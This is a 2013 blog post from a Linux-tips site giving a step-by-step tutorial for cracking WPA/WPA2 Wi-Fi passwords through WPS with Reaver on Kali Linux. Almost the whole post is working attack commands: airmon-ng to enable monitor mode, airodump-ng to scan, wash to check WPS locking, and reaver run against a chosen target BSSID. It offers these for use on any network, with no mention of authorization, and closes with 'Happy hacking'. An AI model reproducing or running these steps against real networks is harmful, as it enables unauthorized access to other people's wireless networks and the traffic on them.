Everthing About Customizing Your Linux Distro Awsome Themes For Linux Cool Icons How Can WE Forget About Conky Penetesting With Kali Linux

Cracking Wpa Wpa2 Encryption Using Reaver On Kali Linux

Tuesday 1 October 2013
Cracking The Wireless Network Wpa Wpa2 Encryption Using Reaver On Kali Linux








Step# 1. You need to get Kali Linux Installed Or Kali Linux live usb 

Step# 2. Boot into your system and open up a terminal 



Step# 3. Type "airmon-ng" to check your wireelss card,


If it does not show it up type "iwconfig"


it will show you your available hardware, then type "ifconfig wlanx up" in my case it is "wlan1"

so my command will be "ifconfig wlan1 up"


Step# 4. Now put your wireless card into monitor mode by typing

"airmon-ng start wlan1"


Now monitor mode is enabled on "mon0"

Step# 5. Now scan for available networks by typing "airodump-ng mon0"






Step# 6. Check wether reaver can crack it or not !!!

type " wash -i mon0" and check wether "wps is locked or not".


If wps is not locked then we can crack it using reaver.


Step# 7. Launch reaver


Crack it by tying "reaver -i mon0 -b 00:11:22:33:44:55 -vv"


replace "00:11:22:33:44:55" with your targets bssid (mac address)

Now wait and tape a nap ... reaver will definitely crack it for you !!!!

You can save the current session by pressing "ctrl+c" and  restore it later..

once you cracked it reaver will crack it next time in only a few seconds...



Happy hacking!!

Enjoy !!!

T3AM INFINITY

video Demonstration ....

0 comments:

Post a Comment

 
Noobs Guide To Linux © 2011 | Designed by Bingo Cash, in collaboration with Modern Warfare 3, VPS Hosting and Compare Web Hosting